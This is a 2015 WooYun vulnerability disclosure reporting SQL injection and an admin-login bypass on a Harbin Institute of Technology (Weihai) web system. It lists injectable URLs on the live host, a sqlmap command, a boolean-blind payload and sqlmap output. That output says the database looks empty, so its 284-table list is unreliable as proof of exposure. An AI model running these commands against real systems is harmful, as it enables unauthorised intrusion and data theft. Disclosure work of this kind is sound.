当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108844

漏洞标题:哈尔滨工业大学(威海)网站存在SQL注入导致管理员后台沦陷

相关厂商:哈尔滨工业大学(威海)

漏洞作者: 药师

提交时间:2015-04-23 15:37

修复时间:2015-04-28 15:38

公开时间:2015-04-28 15:38

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-23: 细节已通知厂商并且等待厂商处理中
2015-04-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

测了测有注入漏洞,管理员信息教师信息学生信息泄露,可进后台。

详细说明:

注入点:http://bb.hitwh.edu.cn:90/news_index.jsp?id=3
http://bb.hitwh.edu.cn:90/wap/classroom_search2.jsp day=0&time=1&louhao=N
http://bb.hitwh.edu.cn:90/wap/showclass.jsp weekday=1&number=88952634
总之随便哪个都可以

A.png


B.png


C.png


python sqlmap.py -u "http://bb.hitwh.edu.cn:90/news_index.jsp?id=3" -D infha --tables
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150418}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 18:40:41
[18:40:41] [INFO] resuming back-end DBMS 'mysql' 
[18:40:41] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 4244=4244
---
[18:40:47] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5
[18:40:47] [INFO] fetching tables for database: 'infha'
[18:40:47] [INFO] fetching number of tables for database 'infha'
[18:40:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:40:47] [INFO] retrieved: 0
[18:40:47] [WARNING] database 'infha' appears to be empty
[18:40:47] [ERROR] unable to retrieve the table names for any database
Database: infha
[284 tables]
+-------------------------------------------------+
| Apply                                           |
| BANNERDATA                                      |
| CPG_bridge                                      |
| CPG_categories                                  |
| CPG_config                                      |
| CPG_filetypes                                   |
| CPG_usergroups                                  |
| Continent                                       |
| DEPENDENT                                       |
| DEPT_LOCATIONS                                  |
| Description                                     |
| Device                                          |
| Flight                                          |
| Gallery                                         |
| GalleryThumb                                    |
| ITEM                                            |
| Keyword                                         |
| LOCATION                                        |
| PRODUCT                                         |
| PROFILE                                         |
| PS_DMK                                          |
| Pilot                                           |
| Publication                                     |
| Publisher                                       |
| QRTZ_BLOB_TRIGGERS                              |
| QRTZ_FIRED_TRIGGERS                             |
| QRTZ_JOB_DETAILS                                |
| SALGRADE                                        |
| SEQUENCE                                        |
| SIGNON                                          |
| ThumbnailKeyword                                |
| UserFields                                      |
| Volume                                          |
| WidgetPrices                                    |
| WidgetReferences                                |
| Action                                          |
| Domain                                          |
| Path                                            |
| catalog                                         |
| language                                        |
| session                                         |
| user                                            |
| acc_trans                                       |
| account                                         |
| accounts                                        |
| action_attribute                                |
| address                                         |
| admin                                           |
| agent                                           |
| agent_specialty                                 |
| alias                                           |
| ap                                              |
| app_user                                        |
| applications                                    |
| ar                                              |
| archive                                         |
| article                                         |
| artist                                          |
| assembly                                        |
| attributeCategory                               |
| book                                            |
| borders                                         |
| borrower                                        |
| branch                                          |
| business                                        |
| categories                                      |
| categories_posts                                |
| category                                        |
| categoryNames                                   |
| categorylinks                                   |
| channels                                        |
| chip_layout                                     |
| city                                            |
| clients                                         |
| collection_item_count                           |
| colnametests                                    |
| color                                           |
| comments                                        |
| community_item_count                            |
| config                                          |
| contact                                         |
| control                                         |
| country                                         |
| course                                          |
| course_section                                  |
| courses                                         |
| customer                                        |
| customers                                       |
| data                                            |
| db                                              |
| defaults                                        |
| delivery_quality                                |
| department                                      |
| departments                                     |
| depositor                                       |
| dept                                            |
| developers                                      |
| developers_projects                             |
| div_allele_assay                                |
| div_experiment                                  |
| div_generation                                  |
| div_locality                                    |
| div_poly_type                                   |
| div_statistic_type                              |
| div_stock                                       |
| div_stock_parent                                |
| div_trait                                       |
| div_trait_uom                                   |
| div_unit_of_measure                             |
| employee                                        |
| employees                                       |
| entrants                                        |
| event                                           |
| events                                          |
| experiment                                      |
| field_options                                   |
| fk_test_has_pk                                  |
| form_data                                       |
| form_data_archive                               |
| form_definition                                 |
| form_definition_text                            |
| form_definition_version                         |
| form_definition_version_text                    |
| friend_statuses                                 |
| friends                                         |
| funny_jokes                                     |
| gifi                                            |
| gl                                              |
| grants                                          |
| groups                                          |
| hitcounter                                      |
| host                                            |
| hosts                                           |
| identification                                  |
| image                                           |
| imageCategoryList                               |
| imageInfo                                       |
| ingredients                                     |
| internetaddress                                 |
| interwiki                                       |
| inventory                                       |
| investigator                                    |
| invoice                                         |
| ipblocks                                        |
| items                                           |
| items_template                                  |
| jiveExtComponentConf                            |
| jiveGroupProp                                   |
| jiveOffline                                     |
| jivePrivacyList                                 |
| jivePrivate                                     |
| jiveProperty                                    |
| jiveRemoteServerConf                            |
| jiveRoster                                      |
| jiveVCard                                       |
| jobs                                            |
| jos_vm_payment_method                           |
| keyboards                                       |
| legacy_things                                   |
| lending                                         |
| licenses                                        |
| loan                                            |
| locale                                          |
| locations                                       |
| logging                                         |
| login                                           |
| lookup                                          |
| makemodel                                       |
| master_table                                    |
| math                                            |
| meals                                           |
| message_statuses                                |
| messages                                        |
| mixins                                          |
| mucAffiliation                                  |
| mucRoomProp                                     |
| news                                            |
| notes                                           |
| object                                          |
| objectcache                                     |
| order_line                                      |
| order_source                                    |
| orders                                          |
| organization                                    |
| osc_categories_description                      |
| osc_manufacturers                               |
| osc_manufacturers_info                          |
| osc_products                                    |
| osc_products_attributes_download                |
| osc_products_images                             |
| osc_products_options_values_to_products_options |
| osc_specials                                    |
| partstax                                        |
| payments                                        |
| people                                          |
| permission                                      |
| permissions                                     |
| person                                          |
| plugin_sid                                      |
| pma_bookmark                                    |
| pma_history                                     |
| pma_pdf_pages                                   |
| pma_relation                                    |
| pokes                                           |
| poll                                            |
| postaladdress                                   |
| primarytest2                                    |
| product_type                                    |
| profile_pictures                                |
| project                                         |
| projects                                        |
| promotion                                       |
| property                                        |
| protocol_action                                 |
| queries                                         |
| question                                        |
| queue_info                                      |
| rcpt                                            |
| readers                                         |
| region                                          |
| regions                                         |
| report                                          |
| request                                         |
| resources                                       |
| revision                                        |
| rights                                          |
| role_permission                                 |
| rooms                                           |
| sailors                                         |
| scripts                                         |
| sections                                        |
| servers                                         |
| sessions                                        |
| settings                                        |
| shipment                                        |
| shipment_line                                   |
| specialty                                       |
| state                                           |
| statename                                       |
| stores                                          |
| student                                         |
| students                                        |
| study                                           |
| subImageInfo                                    |
| subscribers                                     |
| supplier                                        |
| sys_options_cats                                |
| system                                          |
| tasks                                           |
| tax                                             |
| telephone                                       |
| tf_links                                        |
| the                                             |
| tickers                                         |
| topics                                          |
| userAttribute                                   |
| userInfo                                        |
| user_newtalk                                    |
| users                                           |
| vcd_Covers                                      |
| vcd_CoversAllowedOnMediatypes                   |
| vcd_Log                                         |
| vcd_MediaTypes                                  |
| vcd_MetaData                                    |
| vcd_MetaDataTypes                               |
| vcd_PornCategories                              |
| vcd_PornStudios                                 |
| vcd_Pornstars                                   |
| vcd_Screenshots                                 |
| vcd_Sessions                                    |
| vcd_UserProperties                              |
| vcd_UserWishList                                |
| vcd_Users                                       |
| vcd_VcdToPornStudios                            |
| vcd_VcdToUsers                                  |
| vendor                                          |
| vendors                                         |
| video                                           |
| visits                                          |
| warehouse                                       |
| watchlist                                       |
| x_world                                         |
| xmldocument                                     |
| zuseserver                                      |
+-------------------------------------------------+
[18:40:47] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 5 times
[18:40:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/bb.hitwh.edu.cn'

漏洞证明:

http://bb.hitwh.edu.cn:90/login/直接选择教务处管理员登陆即可

1.png


可以增删改管理员
并且还可以把库全部拖下来
包括管理员的账号密码

2.png


3.png


4.png

修复方案:

过滤,预编译等,细节千万不能疏忽。

版权声明:转载请注明来源 药师@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-28 15:38

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-02 18:55 | 一根寒毛 ( 路人 | Rank:17 漏洞数:2 | 野火烧不尽,春风吹又生!)

    哈哈 好搞笑哦 一拳打棉花上了